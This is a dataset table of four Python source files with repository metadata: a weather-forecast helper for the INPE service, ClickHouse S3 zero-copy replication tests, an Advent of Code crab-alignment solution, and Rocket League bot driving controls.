| hexsha (stringlengths 40–40) | size (int64 2–1.02M) | ext (stringclasses 10 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 4–245) | max_stars_repo_name (stringlengths 6–130) | max_stars_repo_head_hexsha (stringlengths 40–40) | max_stars_repo_licenses (listlengths 1–10) | max_stars_count (int64 1–191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24–24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24–24 ⌀) | max_issues_repo_path (stringlengths 4–245) | max_issues_repo_name (stringlengths 6–130) | max_issues_repo_head_hexsha (stringlengths 40–40) | max_issues_repo_licenses (listlengths 1–10) | max_issues_count (int64 1–67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24–24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24–24 ⌀) | max_forks_repo_path (stringlengths 4–245) | max_forks_repo_name (stringlengths 6–130) | max_forks_repo_head_hexsha (stringlengths 40–40) | max_forks_repo_licenses (listlengths 1–10) | max_forks_count (int64 1–105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24–24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24–24 ⌀) | content (stringlengths 2–1.02M) | avg_line_length (float64 1–417k) | max_line_length (int64 1–987k) | alphanum_fraction (float64 0–1) | content_no_comment (stringlengths 0–1.01M) | is_comment_constant_removed (bool 1 class) | is_sharp_comment_removed (bool 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7078d551863ea4d0444a10665588c50f03bd458 | 2,458 | py | Python | util/info_clima_inpe.py | Projeto-Integrador-BD/ivy-projeto-bd | 6796c6601c5b1465b0f7d49593f0575f01bc068f | ["MIT"] | 1 | 2020-05-14T03:41:01.000Z | 2020-05-14T03:41:01.000Z | util/info_clima_inpe.py | Projeto-Integrador-BD/ivy-projeto-bd | 6796c6601c5b1465b0f7d49593f0575f01bc068f | ["MIT"] | null | null | null | util/info_clima_inpe.py | Projeto-Integrador-BD/ivy-projeto-bd | 6796c6601c5b1465b0f7d49593f0575f01bc068f | ["MIT"] | 2 | 2020-05-16T21:31:31.000Z | 2020-06-25T01:05:55.000Z |
from xml.dom import minidom
from urllib import request
import xmltodict, json


def get_informacoes_clima_7_dias(latitude, longitude):
    endpoint_lat_lng = "http://servicos.cptec.inpe.br/XML/cidade/7dias/" + latitude + "/" + longitude + "/previsaoLatLon.xml"
    response = request.urlopen(endpoint_lat_lng)
    data = json.dumps(xmltodict.parse(response))
    return json.loads(data)


def get_texto_previsao_tempo(latitude, longitude):
    clima = get_informacoes_clima_7_dias(latitude, longitude)
    previsao_hoje = clima['cidade']['previsao'][0]
    previsao_texto = "Hoje o tempo está " + get_descricao_tempo_by_sigla(previsao_hoje['tempo'])
    previsao_texto += ", a temperatura máxima é de " + previsao_hoje['maxima'] + ' graus'
    previsao_texto += ", a minima é de " + previsao_hoje['minima'] + " graus celsius"
    previsao_texto += ", essa é a previsão para " + clima['cidade']['nome']
    previsao_texto += ", informações do INPE"
    return previsao_texto


def get_descricao_tempo_by_sigla(sigla):
    return siglas_tempo[sigla]


siglas_tempo = {
    "ec": "Encoberto com Chuvas Isoladas",
    "ci": "Chuvas Isoladas",
    "c": "Chuva",
    "in": "Instável",
    "pp": "Poss. de Pancadas de Chuva",
    "cm": "Chuva pela Manhã",
    "cn": "Chuva a Noite",
    "pt": "Pancadas de Chuva a Tarde",
    "pm": "Pancadas de Chuva pela Manhã",
    "np": "Nublado e Pancadas de Chuva",
    "pc": "Pancadas de Chuva",
    "pn": "Parcialmente Nublado",
    "cv": "Chuvisco",
    "ch": "Chuvoso",
    "t": "Tempestade",
    "ps": "Predomínio de Sol",
    "e": "Encoberto",
    "n": "Nublado",
    "cl": "Céu Claro",
    "nv": "Nevoeiro",
    "g": "Geada",
    "ne": "Neve",
    "nd": "Não Definido",
    "pnt": "Pancadas de Chuva a Noite",
    "psc": "Possibilidade de Chuva",
    "pcm": "Possibilidade de Chuva pela Manhã",
    "pct": "Possibilidade de Chuva a Tarde",
    "pcn": "Possibilidade de Chuva a Noite",
    "npt": "Nublado com Pancadas a Tarde",
    "npn": "Nublado com Pancadas a Noite",
    "ncn": "Nublado com Poss. de Chuva a Noite",
    "nct": "Nublado com Poss. de Chuva a Tarde",
    "ncm": "Nubl. c/ Poss. de Chuva pela Manhã",
    "npm": "Nublado com Pancadas pela Manhã",
    "npp": "Nublado com Possibilidade de Chuva",
    "vn": "Variação de Nebulosidade",
    "ct": "Chuva a Tarde",
    "ppn": "Poss. de Panc. de Chuva a Noite",
    "ppt": "Poss. de Panc. de Chuva a Tarde",
    "ppm": "Poss. de Panc. de Chuva pela Manhã"
}
| 35.623188 | 125 | 0.638731 |
from xml.dom import minidom
from urllib import request
import xmltodict, json


def get_informacoes_clima_7_dias(latitude, longitude):
    endpoint_lat_lng = "http://servicos.cptec.inpe.br/XML/cidade/7dias/" + latitude + "/" + longitude + "/previsaoLatLon.xml"
    response = request.urlopen(endpoint_lat_lng)
    data = json.dumps(xmltodict.parse(response))
    return json.loads(data)


def get_texto_previsao_tempo(latitude, longitude):
    clima = get_informacoes_clima_7_dias(latitude, longitude)
    previsao_hoje = clima['cidade']['previsao'][0]
    previsao_texto = "Hoje o tempo está " + get_descricao_tempo_by_sigla(previsao_hoje['tempo'])
    previsao_texto += ", a temperatura máxima é de " + previsao_hoje['maxima'] + ' graus'
    previsao_texto += ", a minima é de " + previsao_hoje['minima'] + " graus celsius"
    previsao_texto += ", essa é a previsão para " + clima['cidade']['nome']
    previsao_texto += ", informações do INPE"
    return previsao_texto


def get_descricao_tempo_by_sigla(sigla):
    return siglas_tempo[sigla]


siglas_tempo = {
    "ec": "Encoberto com Chuvas Isoladas",
    "ci": "Chuvas Isoladas",
    "c": "Chuva",
    "in": "Instável",
    "pp": "Poss. de Pancadas de Chuva",
    "cm": "Chuva pela Manhã",
    "cn": "Chuva a Noite",
    "pt": "Pancadas de Chuva a Tarde",
    "pm": "Pancadas de Chuva pela Manhã",
    "np": "Nublado e Pancadas de Chuva",
    "pc": "Pancadas de Chuva",
    "pn": "Parcialmente Nublado",
    "cv": "Chuvisco",
    "ch": "Chuvoso",
    "t": "Tempestade",
    "ps": "Predomínio de Sol",
    "e": "Encoberto",
    "n": "Nublado",
    "cl": "Céu Claro",
    "nv": "Nevoeiro",
    "g": "Geada",
    "ne": "Neve",
    "nd": "Não Definido",
    "pnt": "Pancadas de Chuva a Noite",
    "psc": "Possibilidade de Chuva",
    "pcm": "Possibilidade de Chuva pela Manhã",
    "pct": "Possibilidade de Chuva a Tarde",
    "pcn": "Possibilidade de Chuva a Noite",
    "npt": "Nublado com Pancadas a Tarde",
    "npn": "Nublado com Pancadas a Noite",
    "ncn": "Nublado com Poss. de Chuva a Noite",
    "nct": "Nublado com Poss. de Chuva a Tarde",
    "ncm": "Nubl. c/ Poss. de Chuva pela Manhã",
    "npm": "Nublado com Pancadas pela Manhã",
    "npp": "Nublado com Possibilidade de Chuva",
    "vn": "Variação de Nebulosidade",
    "ct": "Chuva a Tarde",
    "ppn": "Poss. de Panc. de Chuva a Noite",
    "ppt": "Poss. de Panc. de Chuva a Tarde",
    "ppm": "Poss. de Panc. de Chuva pela Manhã"
}
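A minimal usage sketch for the module above. The coordinates are hypothetical (roughly São Paulo), and note that latitude and longitude must be passed as strings because they are concatenated directly into the request URL; running it requires the xmltodict package and network access to the CPTEC/INPE service:

if __name__ == "__main__":
    # Hypothetical coordinates, for illustration only.
    print(get_texto_previsao_tempo("-23.55", "-46.63"))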
| true | true |
f7078d55c3300fc63750cbf84fa1adc5f89b9ed6 | 5,396 | py | Python | tests/integration/test_s3_zero_copy_replication/test.py | tianyiYoung/ClickHouse | 41012b5ba49df807af52fc17ab475a21fadda9b3 | ["Apache-2.0"] | 1 | 2021-06-25T07:09:27.000Z | 2021-06-25T07:09:27.000Z | tests/integration/test_s3_zero_copy_replication/test.py | tianyiYoung/ClickHouse | 41012b5ba49df807af52fc17ab475a21fadda9b3 | ["Apache-2.0"] | null | null | null | tests/integration/test_s3_zero_copy_replication/test.py | tianyiYoung/ClickHouse | 41012b5ba49df807af52fc17ab475a21fadda9b3 | ["Apache-2.0"] | 1 | 2021-04-29T07:46:46.000Z | 2021-04-29T07:46:46.000Z |
import logging
import time

import pytest
from helpers.cluster import ClickHouseCluster

logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())


@pytest.fixture(scope="module")
def cluster():
    try:
        cluster = ClickHouseCluster(__file__)
        cluster.add_instance("node1", main_configs=["configs/config.d/s3.xml"], macros={'replica': '1'},
                             with_minio=True,
                             with_zookeeper=True)
        cluster.add_instance("node2", main_configs=["configs/config.d/s3.xml"], macros={'replica': '2'},
                             with_minio=True,
                             with_zookeeper=True)
        logging.info("Starting cluster...")
        cluster.start()
        logging.info("Cluster started")

        yield cluster
    finally:
        cluster.shutdown()


def get_large_objects_count(cluster, size=100):
    minio = cluster.minio_client
    counter = 0
    for obj in minio.list_objects(cluster.minio_bucket, 'data/'):
        if obj.size >= size:
            counter = counter + 1
    return counter


def wait_for_large_objects_count(cluster, expected, size=100, timeout=30):
    while timeout > 0:
        if get_large_objects_count(cluster, size) == expected:
            return
        timeout -= 1
        time.sleep(1)
    assert get_large_objects_count(cluster, size) == expected


@pytest.mark.parametrize(
    "policy", ["s3"]
)
def test_s3_zero_copy_replication(cluster, policy):
    node1 = cluster.instances["node1"]
    node2 = cluster.instances["node2"]

    node1.query(
        """
        CREATE TABLE s3_test ON CLUSTER test_cluster (id UInt32, value String)
        ENGINE=ReplicatedMergeTree('/clickhouse/tables/s3_test', '{}')
        ORDER BY id
        SETTINGS storage_policy='{}'
        """
        .format('{replica}', policy)
    )

    node1.query("INSERT INTO s3_test VALUES (0,'data'),(1,'data')")
    time.sleep(1)
    assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
    assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"

    # Based on version 20.x - should be only one file with size 100+ (checksums.txt), used by both nodes
    assert get_large_objects_count(cluster) == 1

    node2.query("INSERT INTO s3_test VALUES (2,'data'),(3,'data')")
    time.sleep(1)
    assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
    assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"

    # Based on version 20.x - two parts
    wait_for_large_objects_count(cluster, 2)

    node1.query("OPTIMIZE TABLE s3_test")

    # Based on version 20.x - after merge, two old parts and one merged
    wait_for_large_objects_count(cluster, 3)

    # Based on version 20.x - after cleanup, only one merged part
    wait_for_large_objects_count(cluster, 1, timeout=60)

    node1.query("DROP TABLE IF EXISTS s3_test NO DELAY")
    node2.query("DROP TABLE IF EXISTS s3_test NO DELAY")


def test_s3_zero_copy_on_hybrid_storage(cluster):
    node1 = cluster.instances["node1"]
    node2 = cluster.instances["node2"]

    node1.query(
        """
        CREATE TABLE hybrid_test ON CLUSTER test_cluster (id UInt32, value String)
        ENGINE=ReplicatedMergeTree('/clickhouse/tables/hybrid_test', '{}')
        ORDER BY id
        SETTINGS storage_policy='hybrid'
        """
        .format('{replica}')
    )

    node1.query("INSERT INTO hybrid_test VALUES (0,'data'),(1,'data')")
    time.sleep(1)
    assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
    assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"

    assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
    assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"

    node1.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")

    assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
    assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"

    # Total objects in S3
    s3_objects = get_large_objects_count(cluster, 0)

    node2.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")

    assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
    assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"

    # Check that after moving the partition on node2 no new objects appear on S3
    wait_for_large_objects_count(cluster, s3_objects, size=0)

    assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
    assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"

    node1.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
    node2.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
| 39.101449 | 136 | 0.661601 |
import logging
import time

import pytest
from helpers.cluster import ClickHouseCluster

logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())


@pytest.fixture(scope="module")
def cluster():
    try:
        cluster = ClickHouseCluster(__file__)
        cluster.add_instance("node1", main_configs=["configs/config.d/s3.xml"], macros={'replica': '1'},
                             with_minio=True,
                             with_zookeeper=True)
        cluster.add_instance("node2", main_configs=["configs/config.d/s3.xml"], macros={'replica': '2'},
                             with_minio=True,
                             with_zookeeper=True)
        logging.info("Starting cluster...")
        cluster.start()
        logging.info("Cluster started")

        yield cluster
    finally:
        cluster.shutdown()


def get_large_objects_count(cluster, size=100):
    minio = cluster.minio_client
    counter = 0
    for obj in minio.list_objects(cluster.minio_bucket, 'data/'):
        if obj.size >= size:
            counter = counter + 1
    return counter


def wait_for_large_objects_count(cluster, expected, size=100, timeout=30):
    while timeout > 0:
        if get_large_objects_count(cluster, size) == expected:
            return
        timeout -= 1
        time.sleep(1)
    assert get_large_objects_count(cluster, size) == expected


@pytest.mark.parametrize(
    "policy", ["s3"]
)
def test_s3_zero_copy_replication(cluster, policy):
    node1 = cluster.instances["node1"]
    node2 = cluster.instances["node2"]

    node1.query(
        """
        CREATE TABLE s3_test ON CLUSTER test_cluster (id UInt32, value String)
        ENGINE=ReplicatedMergeTree('/clickhouse/tables/s3_test', '{}')
        ORDER BY id
        SETTINGS storage_policy='{}'
        """
        .format('{replica}', policy)
    )

    node1.query("INSERT INTO s3_test VALUES (0,'data'),(1,'data')")
    time.sleep(1)
    assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
    assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"

    assert get_large_objects_count(cluster) == 1

    node2.query("INSERT INTO s3_test VALUES (2,'data'),(3,'data')")
    time.sleep(1)
    assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
    assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"

    wait_for_large_objects_count(cluster, 2)

    node1.query("OPTIMIZE TABLE s3_test")

    wait_for_large_objects_count(cluster, 3)

    wait_for_large_objects_count(cluster, 1, timeout=60)

    node1.query("DROP TABLE IF EXISTS s3_test NO DELAY")
    node2.query("DROP TABLE IF EXISTS s3_test NO DELAY")


def test_s3_zero_copy_on_hybrid_storage(cluster):
    node1 = cluster.instances["node1"]
    node2 = cluster.instances["node2"]

    node1.query(
        """
        CREATE TABLE hybrid_test ON CLUSTER test_cluster (id UInt32, value String)
        ENGINE=ReplicatedMergeTree('/clickhouse/tables/hybrid_test', '{}')
        ORDER BY id
        SETTINGS storage_policy='hybrid'
        """
        .format('{replica}')
    )

    node1.query("INSERT INTO hybrid_test VALUES (0,'data'),(1,'data')")
    time.sleep(1)
    assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
    assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"

    assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
    assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"

    node1.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")

    assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
    assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"

    s3_objects = get_large_objects_count(cluster, 0)

    node2.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")

    assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
    assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"

    wait_for_large_objects_count(cluster, s3_objects, size=0)

    assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
    assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"

    node1.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
    node2.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
| true | true |
f7078da757194a2016dd5bedc4aab55b97d82856 | 551 | py | Python | 07/part1.py | diabonas/aoc2021 | 7b79df77319a77eda1673b652dfed0493d74025e | ["MIT"] | null | null | null | 07/part1.py | diabonas/aoc2021 | 7b79df77319a77eda1673b652dfed0493d74025e | ["MIT"] | null | null | null | 07/part1.py | diabonas/aoc2021 | 7b79df77319a77eda1673b652dfed0493d74025e | ["MIT"] | null | null | null |
#!/usr/bin/python
# SPDX-License-Identifier: MIT
import math

with open("input", "r") as file:
    horizontal_positions = list(map(int, file.readline().split(",")))

cheapest = math.inf
for align in range(min(horizontal_positions), max(horizontal_positions) + 1):
    fuel = sum(abs(p - align) for p in horizontal_positions)
    if fuel < cheapest:
        cheapest = fuel

# Alternative:
# align = int(statistics.median(horizontal_positions))
# cheapest = sum(abs(p - align) for p in horizontal_positions)

print(f"cheapest total fuel: {cheapest}")
| 27.55 | 77 | 0.707804 |
import math

with open("input", "r") as file:
    horizontal_positions = list(map(int, file.readline().split(",")))

cheapest = math.inf
for align in range(min(horizontal_positions), max(horizontal_positions) + 1):
    fuel = sum(abs(p - align) for p in horizontal_positions)
    if fuel < cheapest:
        cheapest = fuel

print(f"cheapest total fuel: {cheapest}")
| true | true |
f7078df968cb5fab7c5b3b2f7582059257952574 | 4,973 | py | Python | agents/RashBot/Handling.py | inXS212/Saltie | 78224ecdcbe049c9a798c5cfac12c223efc0596f | ["MIT"] | null | null | null | agents/RashBot/Handling.py | inXS212/Saltie | 78224ecdcbe049c9a798c5cfac12c223efc0596f | ["MIT"] | null | null | null | agents/RashBot/Handling.py | inXS212/Saltie | 78224ecdcbe049c9a798c5cfac12c223efc0596f | ["MIT"] | null | null | null |
from Util import *


def controls(s):
    s.throttle = curve1((s.y - .63 * s.brakes * s.pyv / ((1 - s.pyv / 2300) * 3 + 1)) / 999)
    s.steer = curve1(Range180(s.a - s.av / 55, 1))
    s.pitch = regress(-s.i - s.iv / 17)
    s.yaw = regress(Range180(s.a - s.av / 12, 1))
    s.roll = regress(Range180(- s.r + s.rv / 22, 1)) * (abs(s.a) < .15)
    s.boost = s.throttle > .5 and abs(s.a) < .12 and (
        s.poG or abs(s.i) < .2) and abs(s.y) > 99 and s.pyv < 2260
    s.powerslide = s.jump = 0

    # general powerslide
    if s.throttle * s.pyv >= 0 and s.av * s.steer >= 0 and s.pxv * s.steer >= 0 and (
            # sliding
            (ang_dif(s.a, s.pva, 1) < .15 and .05 < abs(s.a) < .95) or (
            # turning
            s.pL[2] < 99 and .24 < abs(s.a) < .76 and s.a * ang_dif(s.a, s.av / 7, 1)) or (
            # landing
            s.gtime < .05 and ang_dif(s.a, s.pva, 1) < .25 and not s.kickoff)):
        s.powerslide = 1

    # turn 180°
    if s.d2 > 400 and abs(s.a + s.av / 2.25) > 0.45:
        if abs(s.a) > 0.98:
            s.steer = 1
        if s.d2 > 600 and s.pyv < -90:
            if (abs(s.a) < 0.98 and abs(s.av) > 0.5 and
                    ang_dif(s.a, s.pva, 1) < .25):
                s.powerslide = 1
                s.steer = -sign(s.steer)
        elif s.d2 > 800 and abs(s.a) < 0.95 and s.pyv < 1000:
            s.throttle = 1

    # three point turn
    if (s.poG and 20 < abs(s.x) < 400 and abs(s.y) < 200 and .35 < abs(s.a) < .65
            and abs(s.pyv) < 550 and abs(s.yv) < 550):
        s.throttle = -sign(s.throttle)
        s.steer = -sign(s.steer)

    # general jump
    if (s.z > 140 and s.tojump and (
            # flying jump
            (s.z < (200 * s.jcount + s.pB / 2) * s.dT * 2 and s.d2pv < 99)
            # directly below the ball
            or (s.z < s.jcount * 250 + s.pB * 10 and s.d2pv < 100 and s.vd2 < 150))):
        s.jumper = 1

    # jumping off walls
    if ((s.z > 1350 or ((s.d < s.z * 1.5 or s.vd < 400) and s.pL[2] < 500
            and abs(s.a) < .15 and s.bL[2] < 500)) and s.poG and
            s.pL[2] > 60 and (abs(0.5 - abs(s.a)) > 0.25 or s.d > 2500)) or (
            s.poG and s.pL[2] > 1900 and s.d2pv < 120):
        s.jump = 1

    # flip
    if (s.flip and s.d > 400 and ang_dif(s.a, s.pva, 1) < .06 and s.pB < 80 and
            s.pvd < 2200 and s.jcount > 0 and (s.gtime > 0.05 or not s.poG) and
            not s.jumper and abs(s.i) < .2 and ((s.pyv > 1640 and s.ty - s.yv / 4 > 3500)
            or (abs(s.a) > 0.75 and abs(s.ty - s.yv / 6) > 850 and s.pyv < -140)
            or (s.pyv > 1120 and s.ty - s.yv / 4 > 3000 and s.pB < 16)
            or (2000 > s.pyv > 970 and s.ty - s.pyv / 4 > 1650 and s.pB < 6))):
        s.dodge = 1
        s.djL = 's.tL'

    # jump for wavedash
    if (s.d > 550 and 950 < (s.ty - s.yv / 2) and ang_dif(s.a, s.pva, 1) < .02
            and abs(s.i) < 0.1 and s.pL[2] < 50 and s.poG and s.pB < 40 and
            1050 < s.pvd < 2200 and s.gtime > .1 and s.wavedash):
        s.jump = 1

    # forward wavedash
    if (s.jcount > 0 and s.pL[2] + s.pV[2] / 20 < 32 and abs(s.r) < 0.1 and
            abs(s.a) < 0.04 and s.y > 400 and 0 < abs(s.pR[0] / U) < 0.12 and
            not s.poG and s.pV[2] < -210 and s.wavedash):
        s.jump = 1
        s.pitch = -1
        s.yaw = s.roll = 0

    if s.shoot:
        dodge_hit(s)

    # handling long jumps
    if s.jumper and s.jcount > 0:
        s.jump = 1
        if not s.poG and (s.ljump != s.lljump or not s.ljump):
            s.pitch = s.yaw = s.roll = 0
            if 0.19 < s.airtime and s.z + s.zv / 12 > 120:
                s.jump = not s.ljump

    # handling pre-dodge
    if s.dodge and s.jcount > 0:
        s.jump = s.poG or s.z > 0
        if 0.08 < s.airtime and s.pL[2] > 45:
            exec("s.dja = dodge_ang(s, " + s.djL + ")")
            s.jump = not s.ljump
            s.pitch = abs(s.dja) * 2 - 1
            s.yaw = (abs(Range180(s.dja + .5, 1) * 2) - 1) * .9
            s.roll = 0
            s.djT = s.time

    # handling post-dodge
    if 0.05 < s.djtime < 0.25:
        s.pitch = s.roll = s.yaw = 0
    if 0.25 < s.djtime < 0.65:
        if abs(s.a) < 0.5:
            if abs(s.a) < 0.8:
                s.pitch = -sign(s.iv)
        else:
            s.pitch = s.yaw = s.roll = 0

    if not s.index:
        0


def dodge_hit(s):
    d2pv = d2(s.tL - s.pL - s.pV * (s.dT + .1))
    # dodge hit
    if (d2pv < 99 and abs(s.tL[2] - s.pL[2]) < 110 and s.bd < 1299):
        # dodge to shoot
        if (s.offense and (abs(s.glinex) < 650 or Range180(s.gta - s.gpa, 1) < .01)
                # dodge to clear
                or ((not s.offense or abs(s.a) > .8) and abs(s.oglinex) > 1400)
                # dodge for kickoff
                or s.kickoff):
            s.dodge = 1
            s.djL = 's.bL + s.bV/60'


def dodge_ang(s, tL):
    L = tL - s.pL
    yaw = Range180(s.pR[1] - U / 2, U) * pi / U
    x, y = rotate2D(L[0], L[1], -yaw)
    a = math.atan2(y, x)
    return Range180(a / pi - .5, 1)
| 33.829932 | 92 | 0.465916 |
from Util import *


def controls(s):
    s.throttle = curve1((s.y - .63 * s.brakes * s.pyv / ((1 - s.pyv / 2300) * 3 + 1)) / 999)
    s.steer = curve1(Range180(s.a - s.av / 55, 1))
    s.pitch = regress(-s.i - s.iv / 17)
    s.yaw = regress(Range180(s.a - s.av / 12, 1))
    s.roll = regress(Range180(- s.r + s.rv / 22, 1)) * (abs(s.a) < .15)
    s.boost = s.throttle > .5 and abs(s.a) < .12 and (
        s.poG or abs(s.i) < .2) and abs(s.y) > 99 and s.pyv < 2260
    s.powerslide = s.jump = 0

    if s.throttle * s.pyv >= 0 and s.av * s.steer >= 0 and s.pxv * s.steer >= 0 and (
            (ang_dif(s.a, s.pva, 1) < .15 and .05 < abs(s.a) < .95) or (
            s.pL[2] < 99 and .24 < abs(s.a) < .76 and s.a * ang_dif(s.a, s.av / 7, 1)) or (
            s.gtime < .05 and ang_dif(s.a, s.pva, 1) < .25 and not s.kickoff)):
        s.powerslide = 1

    if s.d2 > 400 and abs(s.a + s.av / 2.25) > 0.45:
        if abs(s.a) > 0.98:
            s.steer = 1
        if s.d2 > 600 and s.pyv < -90:
            if (abs(s.a) < 0.98 and abs(s.av) > 0.5 and
                    ang_dif(s.a, s.pva, 1) < .25):
                s.powerslide = 1
                s.steer = -sign(s.steer)
        elif s.d2 > 800 and abs(s.a) < 0.95 and s.pyv < 1000:
            s.throttle = 1

    if (s.poG and 20 < abs(s.x) < 400 and abs(s.y) < 200 and .35 < abs(s.a) < .65
            and abs(s.pyv) < 550 and abs(s.yv) < 550):
        s.throttle = -sign(s.throttle)
        s.steer = -sign(s.steer)

    if (s.z > 140 and s.tojump and (
            (s.z < (200 * s.jcount + s.pB / 2) * s.dT * 2 and s.d2pv < 99)
            or (s.z < s.jcount * 250 + s.pB * 10 and s.d2pv < 100 and s.vd2 < 150))):
        s.jumper = 1

    if ((s.z > 1350 or ((s.d < s.z * 1.5 or s.vd < 400) and s.pL[2] < 500
            and abs(s.a) < .15 and s.bL[2] < 500)) and s.poG and
            s.pL[2] > 60 and (abs(0.5 - abs(s.a)) > 0.25 or s.d > 2500)) or (
            s.poG and s.pL[2] > 1900 and s.d2pv < 120):
        s.jump = 1

    if (s.flip and s.d > 400 and ang_dif(s.a, s.pva, 1) < .06 and s.pB < 80 and
            s.pvd < 2200 and s.jcount > 0 and (s.gtime > 0.05 or not s.poG) and
            not s.jumper and abs(s.i) < .2 and ((s.pyv > 1640 and s.ty - s.yv / 4 > 3500)
            or (abs(s.a) > 0.75 and abs(s.ty - s.yv / 6) > 850 and s.pyv < -140)
            or (s.pyv > 1120 and s.ty - s.yv / 4 > 3000 and s.pB < 16)
            or (2000 > s.pyv > 970 and s.ty - s.pyv / 4 > 1650 and s.pB < 6))):
        s.dodge = 1
        s.djL = 's.tL'

    if (s.d > 550 and 950 < (s.ty - s.yv / 2) and ang_dif(s.a, s.pva, 1) < .02
            and abs(s.i) < 0.1 and s.pL[2] < 50 and s.poG and s.pB < 40 and
            1050 < s.pvd < 2200 and s.gtime > .1 and s.wavedash):
        s.jump = 1

    if (s.jcount > 0 and s.pL[2] + s.pV[2] / 20 < 32 and abs(s.r) < 0.1 and
            abs(s.a) < 0.04 and s.y > 400 and 0 < abs(s.pR[0] / U) < 0.12 and
            not s.poG and s.pV[2] < -210 and s.wavedash):
        s.jump = 1
        s.pitch = -1
        s.yaw = s.roll = 0

    if s.shoot:
        dodge_hit(s)

    if s.jumper and s.jcount > 0:
        s.jump = 1
        if not s.poG and (s.ljump != s.lljump or not s.ljump):
            s.pitch = s.yaw = s.roll = 0
            if 0.19 < s.airtime and s.z + s.zv / 12 > 120:
                s.jump = not s.ljump

    if s.dodge and s.jcount > 0:
        s.jump = s.poG or s.z > 0
        if 0.08 < s.airtime and s.pL[2] > 45:
            exec("s.dja = dodge_ang(s, " + s.djL + ")")
            s.jump = not s.ljump
            s.pitch = abs(s.dja) * 2 - 1
            s.yaw = (abs(Range180(s.dja + .5, 1) * 2) - 1) * .9
            s.roll = 0
            s.djT = s.time

    if 0.05 < s.djtime < 0.25:
        s.pitch = s.roll = s.yaw = 0
    if 0.25 < s.djtime < 0.65:
        if abs(s.a) < 0.5:
            if abs(s.a) < 0.8:
                s.pitch = -sign(s.iv)
        else:
            s.pitch = s.yaw = s.roll = 0

    if not s.index:
        0


def dodge_hit(s):
    d2pv = d2(s.tL - s.pL - s.pV * (s.dT + .1))
    if (d2pv < 99 and abs(s.tL[2] - s.pL[2]) < 110 and s.bd < 1299):
        if (s.offense and (abs(s.glinex) < 650 or Range180(s.gta - s.gpa, 1) < .01)
                or ((not s.offense or abs(s.a) > .8) and abs(s.oglinex) > 1400)
                or s.kickoff):
            s.dodge = 1
            s.djL = 's.bL + s.bV/60'


def dodge_ang(s, tL):
    L = tL - s.pL
    yaw = Range180(s.pR[1] - U / 2, U) * pi / U
    x, y = rotate2D(L[0], L[1], -yaw)
    a = math.atan2(y, x)
    return Range180(a / pi - .5, 1)
